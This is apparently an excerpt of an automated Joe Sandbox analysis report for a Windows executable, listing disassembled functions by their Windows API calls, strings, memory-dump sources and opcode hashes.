                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: d4abc5a537db1b984ed3c0856422ed70214bfd3364b293e53dc7e9ac267bc25d
                                        • Instruction ID: d65987870856a24af51313f205d85bcaff18c0e5440ccb9f497b378d5e09ffb9
                                        • Opcode Fuzzy Hash: d4abc5a537db1b984ed3c0856422ed70214bfd3364b293e53dc7e9ac267bc25d
                                        • Instruction Fuzzy Hash: D541B431600208AFDB109F58C885BADBBE9EF45364F58C059FD199F292C774AE45CBA1
                                        APIs
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5CF22,?), ref: 00C5DDFD
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5CF22,?), ref: 00C5DE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C5CF45
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5CF7F
                                        • _wcslen.LIBCMT ref: 00C5D005
                                        • _wcslen.LIBCMT ref: 00C5D01B
                                        • SHFileOperationW.SHELL32(?), ref: 00C5D061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: 8d1d8f77c2005441cb8541a6c6b175345ecfc4f1fb201a162c01dcdd8814a9af
                                        • Instruction ID: 1dbb2589edadddf14d502f4ac700edb2ac77d41b082ff5ed31da8dc1af1a8fa1
                                        • Opcode Fuzzy Hash: 8d1d8f77c2005441cb8541a6c6b175345ecfc4f1fb201a162c01dcdd8814a9af
                                        • Instruction Fuzzy Hash: 584142759052189FDF16EBA4DDC1ADEB7B8EF48381F0000E6E905EB142EA34A7C8DB54
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C82E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C82EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C82EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C82F0B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: 390547affb94095cdff438ba5a8faa0d2ce1c8d4152910813bd805715327fab1
                                        • Instruction ID: 2f17c704fecd75b36893702b0cf2dbe5f89bee4d1dfcd8bc471e686ae950329c
                                        • Opcode Fuzzy Hash: 390547affb94095cdff438ba5a8faa0d2ce1c8d4152910813bd805715327fab1
                                        • Instruction Fuzzy Hash: 43312430604250AFDB21DF59DC88F6937E0FB8A725F190165F9118F2B2CB71AD40DB18
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 00C57792
                                        • SysAllocString.OLEAUT32(?), ref: 00C577B0
                                        • SysFreeString.OLEAUT32(?), ref: 00C577B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C577DE
                                        • SysAllocString.OLEAUT32(?), ref: 00C577EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: e1673ab127015316c01cef4f86e52a9c47ac715e9c58ba4ce141c0fea246efe3
                                        • Instruction ID: fa5155c3f40acbfb9b723c2f0e49ba0ff8d2bfe71cc7c4dc1722235fcf9c1f65
                                        • Opcode Fuzzy Hash: e1673ab127015316c01cef4f86e52a9c47ac715e9c58ba4ce141c0fea246efe3
                                        • Instruction Fuzzy Hash: E621A17A604219AFDB11DFA8EC88EBF73ACEB097A47008125BD14DB190D670DDC5C768
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57868
                                        • SysAllocString.OLEAUT32(00000000), ref: 00C5786B
                                        • SysAllocString.OLEAUT32 ref: 00C5788C
                                        • SysFreeString.OLEAUT32 ref: 00C57895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C578AF
                                        • SysAllocString.OLEAUT32(?), ref: 00C578BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 12f277fe6e2210a4c1fc52fd9c94d3a86e15dcae2d4c3c6bb10b07e184b9e207
                                        • Instruction ID: 40685dca9f0b231447681643d0d6fcf2716eed4b33e552f5c005cab2f549d8b6
                                        • Opcode Fuzzy Hash: 12f277fe6e2210a4c1fc52fd9c94d3a86e15dcae2d4c3c6bb10b07e184b9e207
                                        • Instruction Fuzzy Hash: 07219235604114AFDB109FA9EC8CEBA77ACEB087607108125F915DB2E1D674DDC5CB78
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C604F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C6052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 9e2c22cc6a4304c114832d5b18e5872a08ad587b1799843d4fc5c30ae7b627c2
                                        • Instruction ID: f6650e57723655de7d738c234da1d7836ee1d2199ab7d36a84f1479cc251f116
                                        • Opcode Fuzzy Hash: 9e2c22cc6a4304c114832d5b18e5872a08ad587b1799843d4fc5c30ae7b627c2
                                        • Instruction Fuzzy Hash: 45216D75500305ABDF309F69DC85B9B77A4AF44724F304A29F8B2E62E0E7709A40DF28
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C605C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 477e324faa1747dd2f4deed32e285d6261ba25c17f8466ef17359af4b4a7bbf1
                                        • Instruction ID: 3ad9fbddee4ee25f73a9666dedc29d2a9e0f50bdefb2631816896db518d95883
                                        • Opcode Fuzzy Hash: 477e324faa1747dd2f4deed32e285d6261ba25c17f8466ef17359af4b4a7bbf1
                                        • Instruction Fuzzy Hash: 6C212A755002059BDB309F69D884A9B77A8AF95721F300A19FCB1B62E0D7B0DA61CB24
                                        APIs
                                          • Part of subcall function 00BF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                          • Part of subcall function 00BF600E: GetStockObject.GDI32(00000011), ref: 00BF6060
                                          • Part of subcall function 00BF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C84112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C8411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C8412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C84139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C84145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: a1ff3a90b5898300ed3a6cadc75b9ce43ca1f19b4c87cbd876d191d47f0c18b9
                                        • Instruction ID: d8244fef49274d16bced29be07ad1f057b95f14e8be78cdde7765c3ead3ffdad
                                        • Opcode Fuzzy Hash: a1ff3a90b5898300ed3a6cadc75b9ce43ca1f19b4c87cbd876d191d47f0c18b9
                                        • Instruction Fuzzy Hash: E51193B115021A7EEF119F64CC85EEB7F5DEF09798F014110FA18A2090CB729C21DBA4
                                        APIs
                                          • Part of subcall function 00C2D7A3: _free.LIBCMT ref: 00C2D7CC
                                        • _free.LIBCMT ref: 00C2D82D
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2D838
                                        • _free.LIBCMT ref: 00C2D843
                                        • _free.LIBCMT ref: 00C2D897
                                        • _free.LIBCMT ref: 00C2D8A2
                                        • _free.LIBCMT ref: 00C2D8AD
                                        • _free.LIBCMT ref: 00C2D8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: 403dd8f44d73faedc42a4698ca4bfb2b72e6693df4abc881dab0afe416bb1d88
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 7B116371540B24BAD521BFF0EC47FCB7BDC6F14B00F800825B2DAE6892DA79B5456750
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5DA74
                                        • LoadStringW.USER32(00000000), ref: 00C5DA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5DA91
                                        • LoadStringW.USER32(00000000), ref: 00C5DA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5DADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C5DAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: e14b89ab0be7553b745b4bac31086070b83d22cc282b0e719a95ed2d855996c3
                                        • Instruction ID: 721d9dbb6c794f79e0e3f8ab79c1f4cfc73fe0829f7d725e26c7387ceb305334
                                        • Opcode Fuzzy Hash: e14b89ab0be7553b745b4bac31086070b83d22cc282b0e719a95ed2d855996c3
                                        • Instruction Fuzzy Hash: 2F0162F65002087FE710ABA09DC9FEB326CE708701F4004A2B706E2051E6749E844F78
                                        APIs
                                        • InterlockedExchange.KERNEL32(00F0FA40,00F0FA40), ref: 00C6097B
                                        • EnterCriticalSection.KERNEL32(00F0FA20,00000000), ref: 00C6098D
                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C6099B
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C609A9
                                        • CloseHandle.KERNEL32(00000000), ref: 00C609B8
                                        • InterlockedExchange.KERNEL32(00F0FA40,000001F6), ref: 00C609C8
                                        • LeaveCriticalSection.KERNEL32(00F0FA20), ref: 00C609CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 185948c16241080d186b781d0b02b82cdbb6c3b8274cddcc69886f744a9c5657
                                        • Instruction ID: 5d772227257830ec472ffc4fc53d92e166a7908d69a8623065a8c9c69970964f
                                        • Opcode Fuzzy Hash: 185948c16241080d186b781d0b02b82cdbb6c3b8274cddcc69886f744a9c5657
                                        • Instruction Fuzzy Hash: 17F0C932442A12ABD7515BA4EECDBDABB29BF05712F502025F202A08A1C7759975CFA4
                                        APIs
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C71DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C71DE1
                                        • WSAGetLastError.WSOCK32 ref: 00C71DF2
                                        • htons.WSOCK32(?,?,?,?,?), ref: 00C71EDB
                                        • inet_ntoa.WSOCK32(?), ref: 00C71E8C
                                          • Part of subcall function 00C539E8: _strlen.LIBCMT ref: 00C539F2
                                          • Part of subcall function 00C73224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C6EC0C), ref: 00C73240
                                        • _strlen.LIBCMT ref: 00C71F35
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                        • String ID:
                                        • API String ID: 3203458085-0
                                        • Opcode ID: 84eea3d9dcacb4b20cb5b190a8927b28e434d04fe96829b4f29e18ba48e7e888
                                        • Instruction ID: ca2c52ecd3b26cb809e80648cc14fcd5e96ea3814f29e9cab9107e56fbbd1f4f
                                        • Opcode Fuzzy Hash: 84eea3d9dcacb4b20cb5b190a8927b28e434d04fe96829b4f29e18ba48e7e888
                                        • Instruction Fuzzy Hash: E5B1C231204340AFC324DF68C895F2A7BE5AF84318F58854CF96A5B2E2CB31EE45CB91
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00BF5D30
                                        • GetWindowRect.USER32(?,?), ref: 00BF5D71
                                        • ScreenToClient.USER32(?,?), ref: 00BF5D99
                                        • GetClientRect.USER32(?,?), ref: 00BF5ED7
                                        • GetWindowRect.USER32(?,?), ref: 00BF5EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: afcac04dabd2f89df3ab8074e4464729bcbc3170fed62b62b6c05f63711d2e0a
                                        • Instruction ID: f5a923bfdbb077ff0fb30b7aea5610acc3de63be4aac252b641add1ececb8538
                                        • Opcode Fuzzy Hash: afcac04dabd2f89df3ab8074e4464729bcbc3170fed62b62b6c05f63711d2e0a
                                        • Instruction Fuzzy Hash: D8B14634A10B4ADBDB24CFA9C4807EAB7F1FF48310F14841AE9A9D7250DB34AA55DB54
                                        APIs
                                        • __allrem.LIBCMT ref: 00C200BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C200D6
                                        • __allrem.LIBCMT ref: 00C200ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C2010B
                                        • __allrem.LIBCMT ref: 00C20122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C20140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction ID: c56ceb3bdcac6e5c0e265101edcc783ba97b1ca7d5de1716df6bd4e9d71f5fee
                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction Fuzzy Hash: A6811872A007169FE7249F68DC41BAF73E9AF42324F24413EF521D6A82E7B0DE41A750
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C182D9,00C182D9,?,?,?,00C2644F,00000001,00000001,8BE85006), ref: 00C26258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C2644F,00000001,00000001,8BE85006,?,?,?), ref: 00C262DE
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C263D8
                                        • __freea.LIBCMT ref: 00C263E5
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • __freea.LIBCMT ref: 00C263EE
                                        • __freea.LIBCMT ref: 00C26413
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 5e5e8a6e2766c8c064433f1deaaee13702c96223dcf1183c789379900c1c9a94
                                        • Instruction ID: cdcbb925dbc156c5917be8f5ff52142791eb54704dc1b50fd459afc53862f3fd
                                        • Opcode Fuzzy Hash: 5e5e8a6e2766c8c064433f1deaaee13702c96223dcf1183c789379900c1c9a94
                                        • Instruction Fuzzy Hash: FA51F172A00226ABEB258F64EC81FAF7BA9EF44710F154229FD15D7590EB34DD40D6B0
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7BCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7BD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7BD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C7BD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7BDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7BDFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
